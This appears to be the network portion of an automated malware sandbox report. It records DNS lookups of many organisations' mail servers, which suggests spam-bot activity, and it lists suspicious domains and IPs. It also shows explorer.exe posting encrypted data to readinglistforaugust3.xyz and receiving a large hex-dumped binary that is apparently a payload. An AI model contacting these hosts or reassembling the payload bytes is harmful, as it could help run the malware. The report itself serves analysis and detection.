Aug 24, 2021 08:48:26.317349911 CEST	8.8.8.8	192.168.2.7	0xd423	No error (0)	www2.l.google.com		172.217.168.4	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.409360886 CEST	8.8.8.8	192.168.2.7	0x52ec	No error (0)	aggiemail.usu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:26.409360886 CEST	8.8.8.8	192.168.2.7	0x52ec	No error (0)	aggiemail.usu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:26.409360886 CEST	8.8.8.8	192.168.2.7	0x52ec	No error (0)	aggiemail.usu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:26.409360886 CEST	8.8.8.8	192.168.2.7	0x52ec	No error (0)	aggiemail.usu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:26.409360886 CEST	8.8.8.8	192.168.2.7	0x52ec	No error (0)	aggiemail.usu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:26.462579966 CEST	8.8.8.8	192.168.2.7	0x7e84	No error (0)	ASPMX.L.GOOGLE.COM		173.194.69.26	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.472073078 CEST	8.8.8.8	192.168.2.7	0xdc53	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.472073078 CEST	8.8.8.8	192.168.2.7	0xdc53	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.820322037 CEST	8.8.8.8	192.168.2.7	0xd028	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.820322037 CEST	8.8.8.8	192.168.2.7	0xd028	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.086328983 CEST	8.8.8.8	192.168.2.7	0x3ee8	No error (0)	bellsouth.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:27.086328983 CEST	8.8.8.8	192.168.2.7	0x3ee8	No error (0)	bellsouth.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:27.151339054 CEST	8.8.8.8	192.168.2.7	0xad1d	No error (0)	mx0a-00191d01.pphosted.com		67.231.149.140	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.319612980 CEST	8.8.8.8	192.168.2.7	0x3db6	No error (0)	beta.tricity.wsu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:27.428102970 CEST	8.8.8.8	192.168.2.7	0xe88	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.428102970 CEST	8.8.8.8	192.168.2.7	0xe88	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.429102898 CEST	8.8.8.8	192.168.2.7	0x9580	No error (0)	msn-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.429102898 CEST	8.8.8.8	192.168.2.7	0x9580	No error (0)	msn-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.493520021 CEST	8.8.8.8	192.168.2.7	0x503b	No error (0)	mxb-0007b301.gslb.pphosted.com		67.231.152.34	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.703236103 CEST	8.8.8.8	192.168.2.7	0xb6e4	No error (0)	epcor.ca			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:27.703236103 CEST	8.8.8.8	192.168.2.7	0xb6e4	No error (0)	epcor.ca			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:27.805567980 CEST	8.8.8.8	192.168.2.7	0xe245	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.805567980 CEST	8.8.8.8	192.168.2.7	0xe245	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.845654011 CEST	8.8.8.8	192.168.2.7	0xdc73	No error (0)	harborfreight.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:27.845654011 CEST	8.8.8.8	192.168.2.7	0xdc73	No error (0)	harborfreight.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:27.913829088 CEST	8.8.8.8	192.168.2.7	0x9544	No error (0)	mxb-003d1301.gslb.pphosted.com		67.231.151.221	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.972454071 CEST	8.8.8.8	192.168.2.7	0x3b2b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.972454071 CEST	8.8.8.8	192.168.2.7	0x3b2b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.055212975 CEST	8.8.8.8	192.168.2.7	0x7f47	No error (0)	mxa-00515601.gslb.pphosted.com		148.163.135.73	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.169995070 CEST	8.8.8.8	192.168.2.7	0xe5a4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.169995070 CEST	8.8.8.8	192.168.2.7	0xe5a4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.443564892 CEST	8.8.8.8	192.168.2.7	0xdaad	No error (0)	harding.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:28.443564892 CEST	8.8.8.8	192.168.2.7	0xdaad	No error (0)	harding.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:28.443564892 CEST	8.8.8.8	192.168.2.7	0xdaad	No error (0)	harding.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:28.443564892 CEST	8.8.8.8	192.168.2.7	0xdaad	No error (0)	harding.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:28.443564892 CEST	8.8.8.8	192.168.2.7	0xdaad	No error (0)	harding.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:28.499803066 CEST	8.8.8.8	192.168.2.7	0xeccd	No error (0)	www.instagram.com	default-geo-p42.instagram.com		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:48:28.499803066 CEST	8.8.8.8	192.168.2.7	0xeccd	No error (0)	default-geo-p42.instagram.com	z-p42-instagram.c10r.instagram.com		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:48:28.499803066 CEST	8.8.8.8	192.168.2.7	0xeccd	No error (0)	z-p42-instagram.c10r.instagram.com		157.240.17.174	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.529567957 CEST	8.8.8.8	192.168.2.7	0xa530	No error (0)	alt1.aspmx.l.google.com		142.250.150.26	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.530795097 CEST	8.8.8.8	192.168.2.7	0x1f6f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.530795097 CEST	8.8.8.8	192.168.2.7	0x1f6f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.536135912 CEST	8.8.8.8	192.168.2.7	0x90d8	No error (0)	eur.olc.protection.outlook.com		104.47.9.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.536135912 CEST	8.8.8.8	192.168.2.7	0x90d8	No error (0)	eur.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.552052975 CEST	8.8.8.8	192.168.2.7	0xb5ce	No error (0)	nu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:28.552052975 CEST	8.8.8.8	192.168.2.7	0xb5ce	No error (0)	nu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:28.747070074 CEST	8.8.8.8	192.168.2.7	0x8382	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.747070074 CEST	8.8.8.8	192.168.2.7	0x8382	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.774693012 CEST	8.8.8.8	192.168.2.7	0xc9a7	No error (0)	mxb-002b4301.gslb.pphosted.com		148.163.150.232	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.875802040 CEST	8.8.8.8	192.168.2.7	0xba85	No error (0)	work.a-poster.info		37.1.217.172	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.450454950 CEST	8.8.8.8	192.168.2.7	0xe3e5	No error (0)	pepboys.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:29.450454950 CEST	8.8.8.8	192.168.2.7	0xe3e5	No error (0)	pepboys.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:29.561271906 CEST	8.8.8.8	192.168.2.7	0x7018	No error (0)	eur.olc.protection.outlook.com		104.47.9.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.561271906 CEST	8.8.8.8	192.168.2.7	0x7018	No error (0)	eur.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.561862946 CEST	8.8.8.8	192.168.2.7	0xeaf4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.561862946 CEST	8.8.8.8	192.168.2.7	0xeaf4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.691363096 CEST	8.8.8.8	192.168.2.7	0xcae8	No error (0)	mxb-00247301.gslb.pphosted.com		148.163.149.100	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.746506929 CEST	8.8.8.8	192.168.2.7	0xa950	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.746506929 CEST	8.8.8.8	192.168.2.7	0xa950	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.995203972 CEST	8.8.8.8	192.168.2.7	0x36a5	No error (0)	ucsd.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:29.995203972 CEST	8.8.8.8	192.168.2.7	0x36a5	No error (0)	ucsd.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:30.056286097 CEST	8.8.8.8	192.168.2.7	0x864	No error (0)	inbound.ucsd.edu		148.163.141.31	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:30.056286097 CEST	8.8.8.8	192.168.2.7	0x864	No error (0)	inbound.ucsd.edu		148.163.145.30	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:30.139650106 CEST	8.8.8.8	192.168.2.7	0x27f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:30.139650106 CEST	8.8.8.8	192.168.2.7	0x27f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:30.346658945 CEST	8.8.8.8	192.168.2.7	0x3ddf	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:30.346658945 CEST	8.8.8.8	192.168.2.7	0x3ddf	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:30.478796005 CEST	8.8.8.8	192.168.2.7	0xd6fa	No error (0)	uthct.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:30.478796005 CEST	8.8.8.8	192.168.2.7	0xd6fa	No error (0)	uthct.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:30.674909115 CEST	8.8.8.8	192.168.2.7	0x6c21	No error (0)	mxb-00270301.gslb.pphosted.com		208.84.65.239	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:31.132886887 CEST	8.8.8.8	192.168.2.7	0x1e72	No error (0)	wsu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:31.132886887 CEST	8.8.8.8	192.168.2.7	0x1e72	No error (0)	wsu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:31.321997881 CEST	8.8.8.8	192.168.2.7	0x8b32	No error (0)	mxa-0007b301.gslb.pphosted.com		67.231.152.34	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:31.352036953 CEST	8.8.8.8	192.168.2.7	0xddc6	No error (0)	m33access.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:31.428374052 CEST	8.8.8.8	192.168.2.7	0x9693	No error (0)	mx.m33access.com		65.111.222.15	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:31.671648979 CEST	8.8.8.8	192.168.2.7	0xc50c	No error (0)	redbluffkids.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:31.671648979 CEST	8.8.8.8	192.168.2.7	0xc50c	No error (0)	redbluffkids.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:31.671648979 CEST	8.8.8.8	192.168.2.7	0xc50c	No error (0)	redbluffkids.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:31.671648979 CEST	8.8.8.8	192.168.2.7	0xc50c	No error (0)	redbluffkids.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:31.671648979 CEST	8.8.8.8	192.168.2.7	0xc50c	No error (0)	redbluffkids.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:31.712822914 CEST	8.8.8.8	192.168.2.7	0xfd0e	No error (0)	ASPMX.L.GOOGLE.COM		173.194.69.26	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:32.232836962 CEST	8.8.8.8	192.168.2.7	0x4291	No error (0)	highjumpchicago.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:32.232836962 CEST	8.8.8.8	192.168.2.7	0x4291	No error (0)	highjumpchicago.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:32.232836962 CEST	8.8.8.8	192.168.2.7	0x4291	No error (0)	highjumpchicago.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:32.232836962 CEST	8.8.8.8	192.168.2.7	0x4291	No error (0)	highjumpchicago.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:32.232836962 CEST	8.8.8.8	192.168.2.7	0x4291	No error (0)	highjumpchicago.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:32.293278933 CEST	8.8.8.8	192.168.2.7	0x8dd2	No error (0)	aspmx.l.google.com		173.194.69.26	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

readinglistforaugust3.xyz

swretjhwrtj.gq

188.34.200.103

185.49.70.90:2080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49715	212.224.105.79	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 08:46:42.539068937 CEST	5872	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:42.539073944 CEST	5872	OUT	Data Raw: 6c 9b 06 9e 13 ec 9a 09 ce 7a 79 63 e7 e7 5a 19 62 bf a3 46 7d c4 1a de 65 ce 48 18 52 d2 da 52 21 7f 23 0c 24 b7 6e 82 07 3c 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 85 1c 21 bc d5 4a 98 47 ba bf b9 e6 90 3f Data Ascii: lzycZbF}eHRR!#$n<+n/Zo]fa4!j:Q!JG?c$kY} GP@]~TA~NS}&Z.]DR
Aug 24, 2021 08:46:42.627724886 CEST	5874	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:42 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 33 66 66 36 36 0d 0a 19 00 00 00 0f ca 2f 84 77 38 03 07 60 d2 80 a2 bd 69 d9 2a 54 11 f9 3f 11 11 69 c6 03 00 ca e6 04 00 01 d0 ea 5b 01 07 01 00 09 00 9c 03 00 00 9f 24 2b 84 9b 15 0f 1b 8d 31 3e 1f 89 00 1a 00 9a 9e 36 eb 35 c6 1f 1b 28 74 b4 ea e8 ba a8 25 a8 83 82 1b 73 98 df ea a8 d4 7e 16 a7 ef 2c 3e c2 32 14 ea be ef 24 3e 44 3a 13 90 7d 7e 96 3b 32 55 c2 af b2 7b 11 87 ff 09 93 b8 0e 89 4b 95 cb 9a bb 7e 96 48 44 e1 80 c2 33 8f c5 d0 d9 53 6d 17 df f2 e8 40 70 c8 8c 5b a2 7d 08 fb 77 ac b1 da 74 68 df 2b 53 27 b4 4d 72 56 b6 6f 03 90 e0 b7 2e bd 97 54 51 d0 24 c3 4a ff 42 97 9f a3 7e 79 5d 43 0d c5 83 80 6a 74 a6 9b 8d 69 d5 01 98 3e 25 7d c0 5c 60 26 0e 9f 7d 03 0a f7 f8 bd 9a 54 e0 ee 28 f7 34 f4 2f d0 8c 1e 0c 81 10 65 a1 bd 57 6f a5 98 bb b7 84 ef a1 b2 95 45 71 c2 0e c2 db ce de df 0d 32 48 57 a1 05 14 7e e4 f3 6d 49 73 a4 95 73 72 7e 2f 8c 8d df bc ae af 30 1b ae 49 95 a1 e1 82 bf c9 5c 5c 1e ea ec be 4a 0e 4d 26 50 4d a1 0f 25 77 b9 78 a7 a3 e4 48 f3 77 68 be 20 f2 7f b2 8b 88 bb 1f a1 28 57 50 e1 f4 60 cb 93 bf 5a 5e 7f 5d 54 b6 04 a6 3f fd 8a 05 83 18 e7 4c 8e d0 16 e2 c2 c8 9c e0 de 7c 62 9d fc 80 0b 82 d3 1a 9a b7 3d 67 c1 c7 09 b0 da 98 f4 df a6 e2 bf 34 64 06 bd cc 4b 23 5d b2 f6 90 1a 5e 08 07 8b e1 b4 d7 b1 87 4f 0a 40 85 48 44 9d 22 6c d2 e4 64 30 e5 28 45 d7 b7 95 6f 44 6d 98 4f f7 24 09 b9 cd c5 78 d4 b9 26 5f fe 35 ae 11 99 71 e2 8e a1 6c 28 f7 8f ef 97 a0 4d 1b 8c b6 b4 d0 76 f4 2c 5b 7d 92 dd 01 a7 1e ec c1 19 e6 ca ca ab 84 31 b4 be c5 d6 c6 2b cc 67 14 cf 59 cb 79 4e c7 cd 9e a3 e0 13 8d 90 65 b7 d2 4c 1f 71 bc 21 5e 7e f5 1b ca a3 a7 59 e4 af f4 03 e1 e7 d4 0c 7d 8f 06 8d 47 10 b0 b5 c5 0a 91 e3 74 92 3b e0 3a 5f 81 e4 ca 30 53 48 2b 7c ce 8f a6 21 61 85 16 7a 1d 4c 83 ed 89 18 08 96 38 8a b2 74 70 5e 90 e5 f0 9a 0e 54 32 1b ff be 50 40 27 48 81 b0 b0 d2 44 2f a9 82 63 2b 40 34 ac e0 5a 84 7c da e9 4e fc 17 5a 66 70 00 11 e3 d1 e2 79 47 1a 8d b4 00 b0 db 14 e8 54 94 38 23 e6 d9 94 3d 42 13 2a f9 af 54 f1 d8 f7 b4 0f 6e c0 03 2b 57 dc da 77 02 5a 65 e0 66 91 02 29 ed b2 cc 4c 8f 21 d3 9c 04 d0 86 e1 7d b9 cc ff ae b5 75 2b c6 8a 7b 79 3e 20 d3 cc ed a9 48 4b 8b 40 dc 74 94 a9 4d 5b ef 95 f5 82 73 8c 44 c1 9f 4a 5d 1d 30 c6 2a 97 99 d4 a2 9c 2c 25 57 d1 39 a6 c5 df ff 04 8e c4 79 3f 20 01 53 02 d1 69 3a 77 0f 2c 71 f4 95 d4 73 ae 8a 22 30 6f 21 40 5b e5 1d b6 7c 14 52 ba 02 65 cc f4 45 93 f6 4f f6 e6 e2 57 c7 20 13 ea dc 43 ab dc ba f5 a4 04 99 c9 71 fd a8 17 1e 54 40 8e 8c 73 90 f5 b5 c0 f6 c4 5a d8 ce f7 9a 4b 90 ec ea 10 27 d9 62 02 b7 d2 5a bb 08 fb 19 27 87 f0 12 4e e0 4a 1a 46 c4 09 d9 cb a1 b9 27 d8 1d 95 7a c6 78 12 a8 2e fd 61 dd 7f ed 3e a2 8d f3 ae bd a3 b6 67 0c ac ee 95 f1 13 a2 1a c3 3d fe 66 ca 45 34 c6 65 67 ca 4c 79 d1 f1 b4 74 8d 7e e3 da b7 8a 9c 02 dd e5 f6 5f c8 f9 c6 61 bc a4 96 ba ce af 62 b8 18 eb 32 ef 43 9c cc dc 65 98 37 1a 0b 52 de ed 54 ff f9 7e 97 e9 26 ec fe 32 44 58 96 c1 dc 19 85 ab 65 c5 b3 c7 ee 0e b7 14 80 7e 3e 00 d9 fb 05 10 4f 7a fe 01 5c 60 7d de 57 35 48 e7 a6 41 29 88 6b d5 e5 96 52 ac b3 a1 d7 53 8f 46 94 b4 53 09 37 83 48 ad 3d 11 47 fb 2f 84 f0 83 08 c7 ed 69 b8 02 3b a6 2b 95 7c 09 ee 24 7e 8e 50 bd 22 00 a0 d8 e9 53 c5 bc f1 bf 95 30 46 6f c4 f1 93 61 a6 fe f6 12 24 ef 67 0a 4d 9d 25 7f 48 9f 5c c0 37 e1 97 f3 25 c6 a1 57 03 e7 f3 8e cf 20 ce af 10 68 8f 53 60 bb 28 5f e4 34 44 4b ff b0 09 7e 95 9c 3e 32 b5 29 8d 65 99 25 72 4b Data Ascii: 3ff66/w8`iT?i[$+1>65(t%s~,>2$>D:}~;2U{K~HD3Sm@p[}wth+S'MrVo.TQ$JB~y]Cjti>%}\`&}T(4/eWoEq2HW~mIssr~/0I\\JM&PM%wxHwh (WP`Z^]T?L\|b=g4dK#]^O@HD"ld0(EoDmO$x&_5ql(Mv,[}1+gYyNeLq!^~Y}Gt;:_0SH+\|!azL8tp^T2P@'HD/c+@4Z\|NZfpyGT8#=BTn+WwZef)L!}u+{y> HK@tM[sDJ]0*,%W9y? Si:w,qs"0o!@[\|ReEOW CqT@sZK'bZ'NJF'zx.a>g=fE4egLyt~_ab2Ce7RT~&2DXe~>Oz\`}W5HA)kRSFS7H=G/i;+\|$~P"S0Foa$gM%H\7%W hS`(_4DK~>2)e%rK
Aug 24, 2021 08:46:42.627768993 CEST	5875	IN	Data Raw: b7 8b 22 4d 21 4f 11 36 84 b5 a6 2e 2d 89 1c b2 9a 47 06 86 73 70 2f 94 d1 8c 2b c2 c9 c0 0c 6e dc 64 43 ba c9 93 53 82 13 42 09 69 27 5d 7f 05 d2 37 0b e6 4a e5 55 b4 4b 54 62 00 8a 3e e1 8e 12 e5 e4 bb 9f 49 35 b2 d1 fd 76 dd da a5 c8 66 80 19 Data Ascii: "M!O6.-Gsp/+ndCSBi']7JUKTb>I5vf7wVO1Y6PmgoH\G/ap-E;-_3m]Wf=er9XTU^z1,Afcr8-UceO{)t` b(xj,9GTc
Aug 24, 2021 08:46:42.627796888 CEST	5877	IN	Data Raw: da 3a 89 a8 6b 00 ac 74 12 80 fe ef d2 15 b7 80 2a 7e d7 9b fd a8 c1 0f 52 f1 3e 94 7b b5 ff 53 d1 ab 30 08 d6 d6 74 40 7a 25 4c 10 09 72 63 e8 b5 5f 25 6f 66 2d 0f 30 15 5c 5d 82 99 1e ad 6c 80 b8 de e3 6b 1f 38 aa 8f a8 d6 b1 ec b6 e4 69 6c 43 Data Ascii: :kt*~R>{S0t@z%Lrc_%of-0\]lk8ilCNr6zTKf"LtQn/1R;QZyi8a>it5pC<=]-0y)\|tU #\|?uI
Aug 24, 2021 08:46:42.627825022 CEST	5878	IN	Data Raw: ef 20 6c 12 7d 46 58 1c f1 b9 4e dd a3 f7 7a 80 7e 3f a8 2a 34 72 61 ba ca 34 5a e7 dc 5a 35 fe a1 31 15 c9 be 27 ac c9 6b fd f1 1f 4d 2c d4 8a d5 56 b5 8c d8 85 e1 b7 89 dc 7b 41 ff e8 ec bd be a7 8a 78 89 f1 45 b3 77 72 07 84 22 51 57 c5 57 df Data Ascii: l}FXNz~?4ra4ZZ51'kM,V{AxEwr"QWWc{6X=XvNpwA$y\|<i(KdpDZKbSrM-(\:`JH-# +&lTN2U:mhFt4&}eAy*My92+m
Aug 24, 2021 08:46:42.627854109 CEST	5879	IN	Data Raw: d6 66 a4 c1 05 80 8d 65 f7 78 a1 3c 0a f5 40 e5 ef cc 1a 02 49 42 22 e4 d7 7a ed 86 c7 78 cb ce 64 00 55 0c aa e2 5d 11 e3 1b 3d e6 78 c1 c2 2f 3f 22 eb b0 30 c3 ae e4 70 fc 25 17 67 b6 79 fc 6d 87 0b b2 cc b6 79 49 a8 4e d9 52 55 94 a1 85 3c af Data Ascii: fex<@IB"zxdU]=x/?"0p%gymyINRU<VK9(bj{]9\|ReUh`C;SxpGq_R]NP)RCVlb B<*MeXE6YJ 7Q;p4X'hS<s
Aug 24, 2021 08:46:42.627881050 CEST	5881	IN	Data Raw: ed f7 1d 66 7a 64 c9 1a dd 97 58 6d 7b 85 ed d5 a0 01 e1 64 d5 7f 58 75 da d9 05 31 b1 82 9e 3b b3 05 5a 0a 20 6a 1a 9c ab 8c ac 20 68 32 51 72 de 0e fd c1 a1 a5 8a eb 2b 78 82 39 8d 21 e7 51 e8 20 3f 20 4d 70 b3 e0 68 5d 61 43 80 54 58 bd 61 aa Data Ascii: fzdXm{dXu1;Z j h2Qr+x9!Q ? Mph]aCTXaz#By\?0"kND<CA'@L[;)cvL_F8#Eb3TVPbc1i~]Q%dt4i^jt{&%>}GR181WQe#D7i6h
Aug 24, 2021 08:46:42.627908945 CEST	5882	IN	Data Raw: 14 89 c4 ec 98 09 41 7b 5c 75 c7 5e 88 e5 a8 53 e9 5b ef 7f 86 c3 14 f0 42 d3 53 eb 40 47 02 e8 cc e9 30 4d ff 56 cd e9 4e ef 96 c0 79 2d 1b e4 1e 00 19 2c fe 78 56 9a 8e 55 85 97 d2 f6 ae d4 0c 99 7a 77 ad 87 08 a4 b8 8e 96 1b bb d3 55 9d 10 a5 Data Ascii: A{\u^S[BS@G0MVNy-,xVUzwUN^/s-m_W1?1]j\\^#2DME1?z>z3KB9Wk,R2y'P>8:V6}e'-4D9+E1j5@!%2TOgA]!O
Aug 24, 2021 08:46:42.627938032 CEST	5883	IN	Data Raw: b4 2a 1b d8 90 68 ae d8 30 02 62 0b 75 05 11 46 9e 05 2e b5 72 c8 a8 9c 30 df ce ab 2d db 38 1b 98 6f 0b 72 b4 7c 54 60 86 15 fa bd 5e 85 bb 88 17 70 ad 4b bb 1b 45 51 f2 cb b8 b9 21 9a d3 e8 d6 b1 de 67 aa 4c c1 ce 4b b9 68 e1 0c e0 bc 56 5d d9 Data Ascii: *h0buF.r0-8or\|T`^pKEQ!gLKhV]dn{8dP"!Tk(6=j\&^H+X?0_#X&Oqux.Jc]P?kE?x"iT;~6{mPigh~q8qQd?VY
Aug 24, 2021 08:46:42.627966881 CEST	5885	IN	Data Raw: 3a 95 7b 1b 81 d4 f4 92 f4 23 9c 5a 92 12 01 a0 81 47 59 af 79 a6 06 a8 37 10 bf 12 ce cd b9 5a de 3a 39 e4 2a e0 44 95 8f d2 1d 7b f7 dd 95 a6 bb 96 aa 73 27 2b 46 46 c0 d1 3a d1 64 13 25 98 37 be 69 11 81 c6 ea 35 0c c8 57 e8 49 ae ad 11 d3 1e Data Ascii: :{#ZGYy7Z:9*D{s'+FF:d%7i5WId_r<Iy96;XS6UrrWF~c23E1<%ZbXonN{Yez0aR+5sR{i6&/gQh,%><`;
Aug 24, 2021 08:46:42.627995968 CEST	5886	IN	Data Raw: 92 f2 37 b9 7c 94 35 7c d9 bf 87 f5 65 ae d7 10 83 e8 94 a5 40 d5 22 64 10 0f e7 5d ab ce e3 8f 1e d6 14 44 04 c7 6b 55 d0 36 6e 3f 26 52 04 fd 98 cf 19 c5 14 61 e3 31 e7 90 9e da 96 6e 03 15 9e 15 26 1b 66 45 7f 7e ce 96 18 21 55 35 b1 1a 8d 21 Data Ascii: 7\|5\|e@"d]DkU6n?&Ra1n&fE~!U5!I3oZS3$;MN.o]S<ZTNzcXUo2~}73BNDX)dbt3s.{q#1r ({ DF`eW0H)T9Hu
Aug 24, 2021 08:46:42.650511980 CEST	5888	IN	Data Raw: de d6 ea d7 06 73 a7 9a ed 1b 8c 58 f8 4c 8e 6b ff d0 9f 55 ae 10 73 d5 4c 25 e2 69 1a d5 b5 68 d5 fb 42 80 45 c7 1c 0c 9c af a4 22 1a 34 1c b9 a5 7f 3f b0 11 3b 86 77 e6 69 67 ee 2a fb eb bf 81 0c 0f e0 c2 e1 f1 8a c5 f7 ab 67 b7 a0 df 25 04 fa Data Ascii: sXLkUsL%ihBE"4?;wigg%Y33d6\|E:YcKHMw?s}Sh9<)GiVt%ayQn-h.[(x)&aMB=-N=-@0^NyP1unN_graY/
